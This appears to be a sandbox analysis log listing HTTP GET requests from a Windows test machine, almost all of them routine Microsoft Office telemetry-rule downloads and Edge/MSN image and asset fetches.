Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msKSj.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=18874E57A98C67C518B55B63A89566FE&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=b999bbd0c2a6420dd959169b039fe5a6 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=18874E57A98C67C518B55B63A89566FE; _EDGE_S=F=1&SID=143A1788354267EB0AE802BC343E6686; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA12sf7A.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
